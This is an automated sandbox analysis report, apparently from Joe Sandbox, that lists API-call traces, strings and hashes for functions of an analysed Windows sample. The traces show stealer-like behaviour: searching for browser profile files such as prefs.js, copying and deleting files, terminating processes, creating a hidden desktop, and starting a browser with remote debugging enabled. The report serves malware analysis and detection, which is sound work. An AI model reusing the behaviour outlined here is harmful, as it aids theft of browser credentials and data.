                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4B7F
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BA7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 3982ab7966406c0bf567f114da5b45208d1a8ffdd37fc61835d1ebbf78238d75
                                • Instruction ID: 26078e339fe6f25170650bda33ade00bd0987ccf354f601ce7a87a84b456d3de
                                • Opcode Fuzzy Hash: 3982ab7966406c0bf567f114da5b45208d1a8ffdd37fc61835d1ebbf78238d75
                                • Instruction Fuzzy Hash: B2924070A016419FDB24DF29C998F59B7F9AF44314F1A80ADE809DB3A1DB35EC81CB52
                                Function 009C1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C12BF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12E7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C133A
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C135C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C1376
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C13E2
                                • lstrlen.KERNEL32(009E1794), ref: 009C13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C140A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1416
                                • lstrlen.KERNEL32(?), ref: 009C1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1443
                                • lstrcat.KERNEL32(00000000,?), ref: 009C1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C147A
                                • StrCmpCA.SHLWAPI(?,010CD190), ref: 009C14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1535
                                • StrCmpCA.SHLWAPI(?,010CDBF0), ref: 009C1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C15E4
                                • StrCmpCA.SHLWAPI(?,010CD2F8), ref: 009C1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1685
                                • StrCmpCA.SHLWAPI(?,010CD400), ref: 009C16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009C181C
                                • FindClose.KERNEL32(00000000), ref: 009C182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: d5a858d1a4276b589e738b5ace11cd5bd72e7108ebfa0bcb5bc735ae9a7fa2ab
                                • Instruction ID: e15202f826690add4f5d10fb46f06e64cef32d692d3a01f1f59433ee0ff97c46
                                • Opcode Fuzzy Hash: d5a858d1a4276b589e738b5ace11cd5bd72e7108ebfa0bcb5bc735ae9a7fa2ab
                                • Instruction Fuzzy Hash: 72128170A102469BDB24EF78DA89FAE77B8EF85300F14452CB84AE7251DF34DC458B96
                                Function 009CCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 009CCBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CCC13
                                • lstrcat.KERNEL32(?,?), ref: 009CCC5F
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CCC71
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CCC8B
                                • wsprintfA.USER32 ref: 009CCCB0
                                • PathMatchSpecA.SHLWAPI(?,010C89A8), ref: 009CCCE2
                                • CoInitialize.OLE32(00000000), ref: 009CCCEE
                                  • Part of subcall function 009CCAE0: CoCreateInstance.COMBASE(009DB110,00000000,00000001,009DB100,?), ref: 009CCB06
                                  • Part of subcall function 009CCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 009CCB46
                                  • Part of subcall function 009CCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 009CCBC9
                                • CoUninitialize.COMBASE ref: 009CCD09
                                • lstrcat.KERNEL32(?,?), ref: 009CCD2E
                                • lstrlen.KERNEL32(?), ref: 009CCD3B
                                • StrCmpCA.SHLWAPI(?,009DCFEC), ref: 009CCD55
                                • wsprintfA.USER32 ref: 009CCD7D
                                • wsprintfA.USER32 ref: 009CCD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 009CCDB0
                                • wsprintfA.USER32 ref: 009CCDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009CCDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009CCE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 009CCE28
                                • CloseHandle.KERNEL32(00000000), ref: 009CCE33
                                • CloseHandle.KERNEL32(00000000), ref: 009CCE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CCE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CCE94
                                • FindNextFileA.KERNEL32(?,?), ref: 009CCF8D
                                • FindClose.KERNEL32(?), ref: 009CCF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 40c1f19b7638cdbb10dc173ee8449f5419502fed4360a8096b3476ae78c4fd57
                                • Instruction ID: b9d9fcebda0646e6d0ecfc39fd82ae52cd2584743b6881dcbe399e65148b037f
                                • Opcode Fuzzy Hash: 40c1f19b7638cdbb10dc173ee8449f5419502fed4360a8096b3476ae78c4fd57
                                • Instruction Fuzzy Hash: 67C160B1900259AFDB60DF64DD85FEE7779EF88300F044599F50AA7281DE34AE44CBA1
                                Function 009B9770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 009B9790
                                • lstrcat.KERNEL32(?,?), ref: 009B97A0
                                • lstrcat.KERNEL32(?,?), ref: 009B97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 009B97C3
                                • memset.MSVCRT ref: 009B97D7
                                  • Part of subcall function 009D3E70: lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D3EA5
                                  • Part of subcall function 009D3E70: lstrcpy.KERNEL32(00000000,010CE6C8), ref: 009D3ECF
                                  • Part of subcall function 009D3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009B134E,?,0000001A), ref: 009D3ED9
                                • wsprintfA.USER32 ref: 009B9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009B9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009B9844
                                  • Part of subcall function 009D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009D46B9
                                  • Part of subcall function 009D46A0: Process32First.KERNEL32(00000000,00000128), ref: 009D46C9
                                  • Part of subcall function 009D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 009D46DB
                                  • Part of subcall function 009D46A0: StrCmpCA.SHLWAPI(?,?), ref: 009D46ED
                                  • Part of subcall function 009D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D4702
                                  • Part of subcall function 009D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 009D4711
                                  • Part of subcall function 009D46A0: CloseHandle.KERNEL32(00000000), ref: 009D4718
                                  • Part of subcall function 009D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 009D4726
                                  • Part of subcall function 009D46A0: CloseHandle.KERNEL32(00000000), ref: 009D4731
                                • memset.MSVCRT ref: 009B9862
                                • lstrcat.KERNEL32(00000000,?), ref: 009B9878
                                • lstrcat.KERNEL32(00000000,?), ref: 009B9889
                                • lstrcat.KERNEL32(00000000,009E4B60), ref: 009B989B
                                • memset.MSVCRT ref: 009B98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009B98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B9903
                                • StrStrA.SHLWAPI(00000000,010CEC90), ref: 009B9919
                                • lstrcpyn.KERNEL32(00BE93D0,00000000,00000000), ref: 009B9938
                                • lstrlen.KERNEL32(?), ref: 009B994B
                                • wsprintfA.USER32 ref: 009B995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 009B9971
                                • memset.MSVCRT ref: 009B9986
                                • Sleep.KERNEL32(00001388), ref: 009B99E7
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B92E1
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B92FA
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B9399
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B93E6
                                  • Part of subcall function 009D4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 009D4759
                                  • Part of subcall function 009D4740: Process32First.KERNEL32(00000000,00000128), ref: 009D4769
                                  • Part of subcall function 009D4740: Process32Next.KERNEL32(00000000,00000128), ref: 009D477B
                                  • Part of subcall function 009D4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D479C
                                  • Part of subcall function 009D4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 009D47AB
                                  • Part of subcall function 009D4740: CloseHandle.KERNEL32(00000000), ref: 009D47B2
                                  • Part of subcall function 009D4740: Process32Next.KERNEL32(00000000,00000128), ref: 009D47C0
                                  • Part of subcall function 009D4740: CloseHandle.KERNEL32(00000000), ref: 009D47CB
                                • CloseDesktop.USER32(?), ref: 009B9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 2040986984-1862457068
                                • Opcode ID: 93adc251055a497d128b07c74dfc77b3c05f99cc56d23ad4c44f55a750aa5a5f
                                • Instruction ID: 5ca4e53335f24a2480df8f81ce2db86b5c0abe67b38eca789c853e5ee1e8e453
                                • Opcode Fuzzy Hash: 93adc251055a497d128b07c74dfc77b3c05f99cc56d23ad4c44f55a750aa5a5f
                                • Instruction Fuzzy Hash: 05918471A50248ABDB50DFB4DD85FDE77B8EF84700F508599F609AB281DF70AA448BA0
                                Function 009C1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C12BF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12E7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C133A
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C135C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C1376
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C13E2
                                • lstrlen.KERNEL32(009E1794), ref: 009C13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C140A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1416
                                • lstrlen.KERNEL32(?), ref: 009C1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1443
                                • lstrcat.KERNEL32(00000000,?), ref: 009C1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C147A
                                • StrCmpCA.SHLWAPI(?,010CD190), ref: 009C14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1535
                                • StrCmpCA.SHLWAPI(?,010CDBF0), ref: 009C1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009C181C
                                • FindClose.KERNEL32(00000000), ref: 009C182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 254384aa08f626a51b98df71656b3b4fb46632ad950fa967aaa4c9b66835aef1
                                • Instruction ID: 2f4b9a5461f2d1dc299392c25674c4a7d66ecadcd066f7750ef6386bf0cc06cb
                                • Opcode Fuzzy Hash: 254384aa08f626a51b98df71656b3b4fb46632ad950fa967aaa4c9b66835aef1
                                • Instruction Fuzzy Hash: 14C19F71A102469BDB21EF74DE89BEE77B8EF85310F144428F84AA7252DF34DC058B92
                                Function 009CE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 009CE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CE243
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CE263
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CE27D
                                • wsprintfA.USER32 ref: 009CE2A2
                                • StrCmpCA.SHLWAPI(?,009DCFEC), ref: 009CE2B4
                                • wsprintfA.USER32 ref: 009CE2D1
                                  • Part of subcall function 009CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 009CEE12
                                • wsprintfA.USER32 ref: 009CE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 009CE304
                                • lstrcat.KERNEL32(?,010CF3C8), ref: 009CE335
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CE347
                                • lstrcat.KERNEL32(?,?), ref: 009CE358
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CE36A
                                • lstrcat.KERNEL32(?,?), ref: 009CE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009CE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE422
                                • DeleteFileA.KERNEL32(?), ref: 009CE45C
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009CE49B
                                • FindClose.KERNEL32(00000000), ref: 009CE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
